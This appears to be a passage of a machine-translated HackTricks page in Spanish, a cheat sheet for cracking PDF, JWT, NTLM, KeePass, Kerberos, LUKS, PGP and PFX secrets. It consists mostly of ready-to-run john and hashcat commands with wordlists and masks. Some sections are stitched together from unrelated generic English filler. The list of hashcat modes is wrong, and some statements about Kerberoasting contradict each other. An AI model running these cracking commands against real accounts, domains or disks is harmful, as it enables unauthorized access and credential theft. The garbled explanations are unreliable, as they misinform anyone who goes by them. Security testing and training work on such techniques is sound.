Existen diferentes métodos y herramientas disponibles para llevar a cabo ataques de fuerza bruta. Algunas herramientas populares incluyen Hydra, Medusa y John the Ripper. Estas herramientas permiten a los hackers automatizar el proceso de generación y prueba de contraseñas, lo que acelera significativamente el tiempo necesario para encontrar una contraseña válida.
Es importante tener en cuenta que la fuerza bruta puede ser un proceso lento y consumir muchos recursos computacionales. Además, muchos sistemas implementan medidas de seguridad para detectar y bloquear ataques de fuerza bruta, como bloquear una cuenta después de un número determinado de intentos fallidos.
A pesar de estas limitaciones, la fuerza bruta sigue siendo una técnica de hacking popular y efectiva, especialmente cuando se combinan con otras técnicas de ingeniería social o vulnerabilidades en el sistema objetivo. Los hackers utilizan la fuerza bruta para acceder a cuentas de usuario, sistemas de cifrado y otros sistemas protegidos por contraseña.
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didn't work well, john didn't know which hash type was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
Contraseña del propietario de PDF
Para descifrar una contraseña del propietario de PDF, consulta esto: https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/
JWT
git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack
#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John
Descifrado de NTLM
El descifrado de NTLM es una técnica utilizada para obtener contraseñas mediante la fuerza bruta. NTLM (NT LAN Manager) es un protocolo de autenticación utilizado en sistemas operativos Windows.
La fuerza bruta es un método en el que se prueban todas las combinaciones posibles de contraseñas hasta encontrar la correcta. En el caso del descifrado de NTLM, se generan hashes de contraseñas y se comparan con el hash objetivo para encontrar una coincidencia.
Existen varias herramientas y recursos disponibles para llevar a cabo el descifrado de NTLM. Algunas de las herramientas más populares incluyen John the Ripper, Hashcat y oclHashcat. Estas herramientas utilizan técnicas avanzadas de procesamiento de hashes para acelerar el proceso de descifrado.
Es importante tener en cuenta que el descifrado de NTLM es una actividad ilegal sin el consentimiento del propietario del sistema. Solo se debe realizar como parte de una evaluación de seguridad autorizada, como una prueba de penetración.
Format:USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
Keepass
Keepass es un gestor de contraseñas de código abierto que te permite almacenar y gestionar de forma segura tus contraseñas. Utiliza una base de datos encriptada para almacenar tus contraseñas y otros datos confidenciales. Keepass utiliza un algoritmo de cifrado fuerte para proteger tus contraseñas y ofrece funciones adicionales como la generación automática de contraseñas seguras.
Una técnica común utilizada para intentar acceder a una base de datos de Keepass es el ataque de fuerza bruta. En este tipo de ataque, un hacker intenta adivinar la contraseña correcta probando diferentes combinaciones de caracteres hasta encontrar la correcta. Esto puede llevar mucho tiempo y requiere de una gran cantidad de recursos computacionales.
Para proteger tu base de datos de Keepass contra ataques de fuerza bruta, es importante elegir una contraseña segura y compleja. Una contraseña segura debe tener una combinación de letras mayúsculas y minúsculas, números y caracteres especiales. Además, es recomendable utilizar una contraseña larga para aumentar la seguridad.
Otra medida de seguridad importante es habilitar la función de bloqueo después de un número determinado de intentos fallidos de inicio de sesión. Esto evitará que un atacante continúe intentando adivinar la contraseña después de un cierto número de intentos.
Además, es recomendable mantener tu base de datos de Keepass actualizada con las últimas actualizaciones de seguridad. Estas actualizaciones suelen incluir parches para vulnerabilidades conocidas y mejoras en la seguridad del software.
Recuerda que la seguridad de tus contraseñas depende en gran medida de ti. Utiliza Keepass de manera responsable y sigue buenas prácticas de seguridad, como no compartir tus contraseñas con nadie y cambiarlas regularmente.
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Keberoasting
Keberoasting es una técnica de ataque que se utiliza para obtener contraseñas débiles de cuentas de servicio en un dominio de Active Directory. Esta técnica se basa en la debilidad de las contraseñas de servicio que se almacenan en el dominio en forma de hashes de Kerberos.
El proceso de keberoasting comienza identificando las cuentas de servicio en el dominio. Estas cuentas de servicio suelen tener contraseñas fuertes, pero debido a la forma en que se almacenan los hashes de Kerberos, es posible extraerlos y realizar ataques de fuerza bruta para obtener las contraseñas originales.
Una vez identificadas las cuentas de servicio, se extraen los hashes de Kerberos correspondientes. Estos hashes se pueden extraer utilizando herramientas como Mimikatz o PowerSploit. Una vez que se obtienen los hashes, se pueden utilizar herramientas de fuerza bruta como Hashcat para intentar descifrar las contraseñas originales.
Es importante tener en cuenta que keberoasting solo es efectivo contra contraseñas débiles. Si las contraseñas son lo suficientemente fuertes, el proceso de descifrado puede llevar mucho tiempo o incluso ser imposible.
Para protegerse contra el keberoasting, es recomendable utilizar contraseñas fuertes para las cuentas de servicio y asegurarse de que se implementen políticas de contraseñas sólidas en el dominio. Además, es importante monitorear y auditar regularmente las cuentas de servicio para detectar cualquier actividad sospechosa.
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
Imagen de Lucks
Método 1
Instalar: https://github.com/glv2/bruteforce-luks
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
Método 2
Brute force is a common method used in hacking to gain unauthorized access to a system or account. It involves systematically trying all possible combinations of passwords until the correct one is found.
To perform a brute force attack, hackers use automated tools that can generate and test thousands or even millions of password combinations per second. These tools often rely on dictionaries of commonly used passwords or employ algorithms to generate variations of words, numbers, and symbols.
Brute force attacks can be time-consuming and resource-intensive, especially if the target system has implemented security measures such as account lockouts or CAPTCHA. However, they can still be effective against weak or easily guessable passwords.
To protect against brute force attacks, it is important to use strong, unique passwords that are not easily guessable. Additionally, implementing measures such as account lockouts, CAPTCHA, and rate limiting can help mitigate the risk of a successful brute force attack.
While brute force attacks can be a powerful tool for hackers, they are also detectable. Monitoring for multiple failed login attempts, unusual patterns of login activity, or an excessive number of requests can help identify and prevent brute force attacks.
Overall, understanding the concept of brute force attacks and implementing appropriate security measures can help protect against unauthorized access to systems and accounts.
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
Otro tutorial de BF de Luks: http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1
Mysql
#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
Clave privada PGP/GPG
A PGP/GPG private key is a crucial component in the encryption and decryption process. It is used to securely encrypt messages and files, ensuring that only the intended recipient can access the information.
The private key should be kept confidential and protected at all times. If an attacker gains access to your private key, they can decrypt any messages or files encrypted with your public key.
To generate a PGP/GPG private key, you can use various tools and software, such as GnuPG. It is important to choose a strong passphrase for your private key to enhance its security.
Remember to regularly back up your private key and store it in a secure location. Losing your private key can result in permanent data loss, as encrypted files and messages cannot be decrypted without it.
In summary, the PGP/GPG private key is a vital component in ensuring the security and confidentiality of your encrypted communications. Keep it safe and protected to prevent unauthorized access to your sensitive information.
gpg2john private_pgp.key #This will generate the hash and save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
Cisco
DPAPI Master Key
Utiliza https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py y luego john
Columna protegida por contraseña en Open Office
Si tienes un archivo xlsx con una columna protegida por contraseña, puedes desprotegerla:
- Cárgalo en Google Drive y la contraseña se eliminará automáticamente
- Para eliminarla manualmente:
unzip file.xlsx
grep -R "sheetProtection" ./*
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
# Remove that line and rezip the file
zip -r file.xls .
Certificados PFX
Los certificados PFX son archivos que contienen tanto la clave privada como el certificado público. Estos archivos se utilizan comúnmente en entornos de seguridad para autenticar y cifrar la comunicación entre sistemas. Los certificados PFX se pueden utilizar en una variedad de aplicaciones, como servidores web, servicios de correo electrónico y VPN.
Ataques de fuerza bruta
Un ataque de fuerza bruta es una técnica utilizada por los hackers para descifrar contraseñas o claves de cifrado mediante la prueba de todas las combinaciones posibles hasta encontrar la correcta. Este tipo de ataque puede ser extremadamente efectivo, pero también puede llevar mucho tiempo dependiendo de la complejidad de la contraseña o clave.
Existen varias herramientas y recursos disponibles para llevar a cabo ataques de fuerza bruta, como programas de software especializados y diccionarios de contraseñas. Es importante tener en cuenta que los ataques de fuerza bruta son ilegales y solo deben ser realizados por profesionales de la seguridad en el contexto de pruebas de penetración autorizadas.
# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
Utilice Trickest para construir y automatizar flujos de trabajo fácilmente con las herramientas comunitarias más avanzadas del mundo.
Obtenga acceso hoy:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Herramientas
Ejemplos de hash: https://openwall.info/wiki/john/sample-hashes
Identificador de hash
hash-identifier
> <HASH>
Listas de palabras
Herramientas de generación de listas de palabras
- kwprocessor: Generador avanzado de combinaciones de teclado con caracteres base, mapa de teclado y rutas configurables.
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt
Mutación de John
Lee /etc/john/john.conf y configúralo.
john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
Hashcat
Ataques de Hashcat
- Ataque de lista de palabras (
-a 0
) con reglas
Hashcat ya viene con una carpeta que contiene reglas pero puedes encontrar otras reglas interesantes aquí.
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
- Ataque de combinación de listas de palabras
Es posible combinar 2 listas de palabras en 1 con hashcat.
Si la lista 1 contiene la palabra "hello" y la segunda contiene 2 líneas con las palabras "world" y "earth". Se generarán las palabras helloworld
y helloearth
.
# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
# Same attack as before but adding chars in the newly generated words
# In the previous example this will generate:
## hello-world!
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
- Ataque de máscara (
-a 3
)
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff
# Mask attack declaring custom charset
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.
# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
- Ataque de Wordlist + Máscara (
-a 6
) / Máscara + Wordlist (-a 7
)
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
Modos de Hashcat
Hashcat es una herramienta de cracking de contraseñas que admite varios modos de ataque. Estos modos determinan cómo se procesan y se prueban las contraseñas. A continuación se presentan los modos de Hashcat más comunes:
-
Modo de ataque de diccionario (modo 0): Este modo utiliza un archivo de diccionario que contiene una lista de palabras o combinaciones de palabras para probar como contraseñas. Hashcat probará cada entrada del diccionario hasta encontrar una coincidencia.
-
Modo de ataque de fuerza bruta (modo 3): En este modo, Hashcat probará todas las combinaciones posibles de caracteres para encontrar la contraseña correcta. Este modo es extremadamente lento y generalmente se utiliza como último recurso cuando otros métodos de ataque no tienen éxito.
-
Modo de ataque de máscara (modo 6): En este modo, se especifica una máscara que define el patrón de la contraseña. Hashcat generará todas las combinaciones posibles de caracteres que se ajusten a la máscara especificada.
-
Modo de ataque de reglas (modo 7): Este modo utiliza reglas predefinidas o personalizadas para modificar las contraseñas del diccionario antes de probarlas. Estas reglas pueden incluir cambios en la capitalización, la adición de números o símbolos, entre otros.
-
Modo de ataque de combinación (modo 1): En este modo, Hashcat combina palabras de un archivo de diccionario para formar contraseñas. Puede especificar el número de palabras que se combinarán y el orden en que se combinarán.
-
Modo de ataque de ataque híbrido (modo 6): Este modo combina el ataque de diccionario con el ataque de fuerza bruta. Hashcat probará primero todas las entradas del diccionario y luego realizará un ataque de fuerza bruta en las contraseñas que no se encontraron en el diccionario.
Estos son solo algunos de los modos de ataque que ofrece Hashcat. Cada modo tiene sus propias ventajas y desventajas, y la elección del modo dependerá del escenario de hacking y de las características de la contraseña que se está intentando crackear.
hashcat --example-hashes | grep -B1 -A2 "NTLM"
Descifrando Hashes de Linux - archivo /etc/shadow
El archivo /etc/shadow
en sistemas Linux almacena las contraseñas de los usuarios en forma de hashes. Estos hashes son generados utilizando algoritmos criptográficos como MD5, SHA-256, etc. En este capítulo, exploraremos una técnica comúnmente utilizada para descifrar estos hashes, conocida como ataque de fuerza bruta.
Ataque de Fuerza Bruta
El ataque de fuerza bruta es un método utilizado para descifrar contraseñas probando todas las combinaciones posibles hasta encontrar la correcta. En el contexto de descifrar hashes de contraseñas, esto implica generar hashes para todas las posibles contraseñas y compararlos con el hash objetivo.
Existen varias herramientas disponibles para realizar ataques de fuerza bruta en hashes de Linux, como John the Ripper, Hashcat, etc. Estas herramientas utilizan diccionarios de contraseñas predefinidos o generan combinaciones de contraseñas basadas en reglas específicas.
Diccionarios de Contraseñas
Un diccionario de contraseñas es una lista de palabras o combinaciones de palabras que se utilizan para probar contraseñas durante un ataque de fuerza bruta. Estos diccionarios pueden ser generados por el atacante o descargados de fuentes públicas.
Es importante tener en cuenta que el éxito de un ataque de fuerza bruta depende en gran medida de la calidad del diccionario de contraseñas utilizado. Un diccionario bien elaborado contiene palabras comunes, combinaciones de palabras, nombres propios, variaciones de palabras, etc.
Reglas de Generación de Contraseñas
Además de los diccionarios de contraseñas, las herramientas de fuerza bruta también utilizan reglas de generación de contraseñas para probar combinaciones adicionales. Estas reglas pueden incluir agregar números al final de las palabras, reemplazar letras por símbolos, invertir el orden de las letras, entre otros.
Las reglas de generación de contraseñas pueden aumentar significativamente la cantidad de combinaciones probadas durante un ataque de fuerza bruta, lo que aumenta las posibilidades de descifrar el hash objetivo.
Consideraciones de Seguridad
Es importante tener en cuenta que el uso de ataques de fuerza bruta para descifrar hashes de contraseñas es una actividad ilegal sin el consentimiento del propietario del sistema. Además, los sistemas modernos suelen implementar medidas de seguridad adicionales, como bloqueo de cuentas después de varios intentos fallidos de inicio de sesión.
En resumen, el ataque de fuerza bruta es una técnica comúnmente utilizada para descifrar hashes de contraseñas en sistemas Linux. Sin embargo, su éxito depende de la calidad del diccionario de contraseñas utilizado y las reglas de generación de contraseñas aplicadas.
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
Fuerza bruta
La fuerza bruta es una técnica comúnmente utilizada para descifrar contraseñas en sistemas Windows. Consiste en probar todas las combinaciones posibles de caracteres hasta encontrar la contraseña correcta. Aunque es un método lento y consume muchos recursos, puede ser efectivo si se utiliza correctamente.
Herramientas de fuerza bruta
Existen varias herramientas de fuerza bruta disponibles que pueden ayudar en el proceso de descifrado de contraseñas de Windows. Algunas de las herramientas más populares incluyen:
- John the Ripper: una herramienta de descifrado de contraseñas que admite una amplia gama de algoritmos de hash utilizados en Windows.
- Hashcat: una herramienta de descifrado de contraseñas de alto rendimiento que utiliza la potencia de procesamiento de la GPU para acelerar el proceso de fuerza bruta.
- Cain & Abel: una herramienta de recuperación de contraseñas que también incluye capacidades de fuerza bruta.
Ataques de fuerza bruta
Existen diferentes tipos de ataques de fuerza bruta que se pueden utilizar para descifrar contraseñas de Windows. Algunos de los ataques más comunes incluyen:
- Ataque de diccionario: este tipo de ataque utiliza una lista predefinida de palabras o combinaciones de palabras para probar como contraseñas.
- Ataque de fuerza bruta pura: en este tipo de ataque, se prueban todas las combinaciones posibles de caracteres hasta encontrar la contraseña correcta.
- Ataque de fuerza bruta híbrida: este tipo de ataque combina un ataque de diccionario con un ataque de fuerza bruta pura, lo que permite probar una amplia gama de combinaciones posibles.
Consideraciones de seguridad
Es importante tener en cuenta que el uso de la fuerza bruta para descifrar contraseñas de Windows puede ser ilegal y violar las leyes de privacidad y seguridad. Solo se debe realizar este tipo de actividad en sistemas autorizados y con el consentimiento del propietario del sistema.
Además, es importante utilizar contraseñas seguras y robustas para proteger los sistemas Windows. Las contraseñas deben ser lo suficientemente largas y complejas como para resistir los ataques de fuerza bruta. También se recomienda utilizar autenticación de dos factores para agregar una capa adicional de seguridad.
3000 | LM | Operating-Systems
1000 | NTLM | Operating-Systems
Fuerza Bruta de Hashes de Aplicaciones Comunes
La fuerza bruta es una técnica comúnmente utilizada para descifrar contraseñas o hashes de contraseñas. Consiste en probar todas las combinaciones posibles hasta encontrar la correcta. En el caso de los hashes de contraseñas de aplicaciones comunes, se pueden utilizar diferentes herramientas y recursos para llevar a cabo este proceso.
Herramientas de Fuerza Bruta
Existen varias herramientas populares que se pueden utilizar para realizar ataques de fuerza bruta en hashes de contraseñas. Algunas de ellas incluyen:
- John the Ripper: una herramienta de cracking de contraseñas que admite una amplia variedad de formatos de hash.
- Hashcat: una herramienta de cracking de contraseñas que utiliza la potencia de procesamiento de la GPU para acelerar el proceso de fuerza bruta.
- Hydra: una herramienta de cracking de contraseñas en línea que puede realizar ataques de fuerza bruta en servicios como SSH, FTP, Telnet, entre otros.
Diccionarios de Contraseñas
Además de las herramientas de fuerza bruta, también es importante contar con diccionarios de contraseñas. Estos diccionarios contienen una lista de palabras comunes, combinaciones de palabras y patrones que se utilizan con frecuencia como contraseñas. Algunos ejemplos de diccionarios populares son:
- RockYou: un diccionario de contraseñas que contiene millones de contraseñas filtradas de una brecha de seguridad en el sitio web RockYou.
- SecLists: una colección de diccionarios y archivos de palabras que se utilizan en pruebas de penetración y auditorías de seguridad.
Recursos Adicionales
Además de las herramientas y diccionarios mencionados anteriormente, existen otros recursos que pueden ser útiles al realizar ataques de fuerza bruta en hashes de contraseñas. Algunos de ellos incluyen:
- CrackStation: un sitio web que ofrece un servicio en línea para descifrar hashes de contraseñas utilizando su base de datos de hashes precalculados.
- Rainbow Tables: tablas precalculadas que contienen pares de valores hash y contraseñas correspondientes, lo que acelera el proceso de descifrado.
Es importante tener en cuenta que el uso de la fuerza bruta para descifrar contraseñas o hashes de contraseñas sin el consentimiento del propietario es ilegal y puede tener consecuencias legales graves. Esta información se proporciona únicamente con fines educativos y de seguridad.
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
5100 | Half MD5 | Raw Hash
100 | SHA1 | Raw Hash
10800 | SHA-384 | Raw Hash
1400 | SHA-256 | Raw Hash
1700 | SHA-512 | Raw Hash
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
- Descubre La Familia PEASS, nuestra colección exclusiva de NFTs
- Obtén el merchandising oficial de PEASS y HackTricks
- Únete al 💬 grupo de Discord o al grupo de Telegram o sígueme en Twitter 🐦@carlospolopm.
- Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y al repositorio de hacktricks-cloud.
Utiliza Trickest para construir y automatizar flujos de trabajo con las herramientas comunitarias más avanzadas del mundo.
Obtén acceso hoy mismo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}